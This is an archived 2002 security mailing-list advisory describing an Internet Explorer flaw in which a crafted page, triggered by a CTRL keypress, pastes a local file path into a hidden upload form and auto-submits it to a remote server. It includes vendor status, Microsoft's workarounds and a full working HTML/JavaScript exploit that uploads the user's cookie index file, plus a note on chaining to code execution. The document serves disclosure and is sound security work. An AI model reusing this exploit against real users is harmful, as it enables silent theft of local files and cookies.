Pressing CTRL in IE is dangerous - Sandblad advisory #8

From: Andreas Sandblad (sandbladat_private)
Date: Tue Jul 23 2002 - 12:50:30 PDT

  • Next message: H D Moore: "Re: SSH Protocol Trick" 

                      - Sandblad advisory #8 -

---..---..---..---..---..---..---..---..---..---..---..---..----
Title:      Pressing CTRL in IE is dangerous
Date:       [2002-07-23]
Software:   Internet Explorer
Impact:     Pressing CTRL in IE may result in arbitrary local
            file to be uploaded to a remote server (no exact
            path needed). If special sensitive information is
            uploaded, it may be used to run remote programs.
Vendor:     http://www.microsoft.com/              _     _
Patch:      none                                 o' \,=./ `o
Author:     Andreas Sandblad, sandbladat_private   (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---


VENDOR STATUS:
==============

02-06-16
Microsoft was contacted about the issue.

02-07-23
Microsoft sent the following statement:
"After investigation, our product team has confirmed that this does not
meet the bar of a security vulnerability. We will not be releasing a
hotfix or patch for this issue."
They proposed the following possible workarounds:
1. disable or set to prompt - "Submit nonencrypted form data" option
2. disable "allow paste operations via script" (best)
3. disable active scripting


DESCRIPTION:
============

A special crafted webpage can retrieve any local file using simple
javascript. This is possible by performing the following steps:

1. When an user presses the CTRL key an onkeydown event can be set to
fire. In the event function the key pressed is changed to 'V'. The result
will be a paste operation with less restrictions.

2. The content of the clipboard is altered and focus is changed to a
hidden file upload form. The paste operation will be performed into the
form, yielding a change of value for the file upload field (not normally
allowed).

3. The upload form is submited automaticly (legal javascript operation).

It isn't necessary to know the exact path to local files because it's
possible to refer to a file with "..\filename".

Further on, if the local file "..\LOCALS~1\TEMPOR~1\CONTENT.IE5\index.dat"
is uploaded, then the random directories needed to get the exact path to
the temporarily internet folders can be retrieved. Knowing the exact path
a compiled help file .chm can be dumped and launched with showHelp() (old
.chm attack). The compiled help file is allowed to have instructions to
execute arbitrary programs.


EXPLOIT:
========

Instructions:
Put the html code in a remote html document and load it with Internet
Explorer. Activate the exploit by pressing CTRL. You must prepare a server
side script to take care of the upload process ("upload.php"). If you
choose to use php I recommend
http://www.php.net/manual/en/features.file-upload.php
as a reference on how to setup a server side script taking care of a file
upload.

Note:
1. Please remove all "!" characters in the exploit code. They have been
inserted to decrease false virus alarms triggered by this mail.
2. Default settings are assumed.

Exploit:
-------------------------- CUT HERE -------------------------------
<!div id=h style="zoom:0.0001">
<!form name=u enctype="multipart/form-data" method=post action=upload.php>
<!input type=file name=file></form></div>
<!script>
//uploadFile="..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat";
uploadFile="..\\Cookies\\index.dat";
function gotKey(){
  if (!event.ctrlKey) return;
  document.onkeydown = null;
  event.keyCode = 86;
  window.clipboardData.setData("Text",uploadFile);
  (p=document.forms.u.file).focus();
  p.onpropertychange = function(){document.forms.u.submit()};
} document.onkeydown = gotKey;
window.onload=function(){document.body.focus()};
<!/script>
-------------------------- CUT HERE -------------------------------


Disclaimer:
===========
Andreas Sandblad is not responsible for the misuse of the
information provided in this advisory. The opinions expressed
are my own and not of any company. In no event shall the author
be liable for any damages whatsoever arising out of or in
connection with the use or spread of this advisory. Any use of
the information is at the user's own risk.


Old advisories:
===============
#7 [2002-05-19] "IE dot bug"
http://online.securityfocus.com/archive/1/273168
#6 [2002-05-15] "Opera javascript protocoll vulnerability"
http://online.securityfocus.com/archive/1/272583
#5 [2002-04-26] "Mp3 file can execute code in Winamp."
http://online.securityfocus.com/archive/1/269724
#4 [2002-04-15] "Using the backbutton in IE is dangerous."
http://online.securityfocus.com/archive/1/267561


Feedback:
=========
Please send suggestions and comments to:           _     _
sandbladat_private                              o' \,=./ `o
                                                    (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
Andreas Sandblad,
student in Engineering Physics at Umea University, Sweden.
-/---/---/---/---/---/---/---/---/---/---/---/---/---/---/---/--

    This archive was generated by hypermail 2b30 : Tue Jul 23 2002 - 13:22:26 PDT